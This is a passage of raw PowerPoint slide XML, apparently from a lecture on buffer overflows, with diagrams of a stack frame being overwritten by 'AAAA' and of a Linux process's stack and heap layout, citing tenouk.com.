              <a:rPr lang="en" sz="1400"/>
              <a:t>	  // do something</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="458" name="Shape 458"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5941969" y="1757700"/>
            <a:ext cx="2050200" cy="4770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rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>AAAA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>saved frame pointer (SFP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>return address (ret)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>*buf (function's argument)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main()'s stack frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="459" name="Shape 459"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754739" y="6295550"/>
            <a:ext cx="1448100" cy="354000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>[high memory]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="460" name="Shape 460"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754739" y="1571150"/>
            <a:ext cx="1448100" cy="354000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>[low memory]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="461" name="Shape 461"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="1674450" y="2853225"/>
            <a:ext cx="4089600" cy="613500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="462" name="Shape 462"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7352750" y="2735300"/>
            <a:ext cx="15600" cy="660600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="463" name="Shape 463"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7948980" y="2735300"/>
            <a:ext cx="1078500" cy="739200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>writes towards high memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="464" name="Shape 464"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3294575" y="3631875"/>
            <a:ext cx="2562900" cy="840000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>overflow!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="465" name="Shape 465"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8205050" y="2513000"/>
            <a:ext cx="882900" cy="307500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$ESP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="466" name="Shape 466"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="465" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7992350" y="2666750"/>
            <a:ext cx="212700" cy="39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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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Shape 471"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="216375" y="1550388"/>
            <a:ext cx="8229600" cy="4840200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Program scratch space ----</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>STACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>-------&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>local (scoped) variables, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>environment variables,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>passed arguments,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>return instruction pointers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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>dynamic space             ------</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HEAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>-----&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	malloc(...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	new(...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stack grows towards low memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heap grows towards high memory</a:t>
            </a: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472" name="Shape 472"/>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Linux process</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Memory view</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="473" name="Shape 473"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4391475" y="152400"/>
            <a:ext cx="4403222" cy="6600239"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="474" name="Shape 474"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6865125" y="257925"/>
            <a:ext cx="2084100" cy="416700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xFFFFFFFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="475" name="Shape 475"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6865125" y="6261650"/>
            <a:ext cx="2084100" cy="4167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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x00000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="476" name="Shape 476"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1296210" y="5592950"/>
            <a:ext cx="3137400" cy="1085400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Source: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.tenouk.com/Bufferoverflowc/Bufferoverflow1c.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="477" name="Shape 477"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3656350" y="1838725"/>
            <a:ext cx="0" cy="503400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="478" name="Shape 478"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3503950" y="1838725"/>
            <a:ext cx="0" cy="503400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="479" name="Shape 479"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3808750" y="1838725"/>
            <a:ext cx="0" cy="503400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="480" name="Shape 480"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3961150" y="1838725"/>
            <a:ext cx="0" cy="503400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="481" name="Shape 481"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3351550" y="1838725"/>
            <a:ext cx="0" cy="503400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="482" name="Shape 482"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3199150" y="1838725"/>
            <a:ext cx="0" cy="503400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="483" name="Shape 483"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3046750" y="1838725"/>
            <a:ext cx="0" cy="503400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="484" name="Shape 484"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2894350" y="1838725"/>
            <a:ext cx="0" cy="503400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
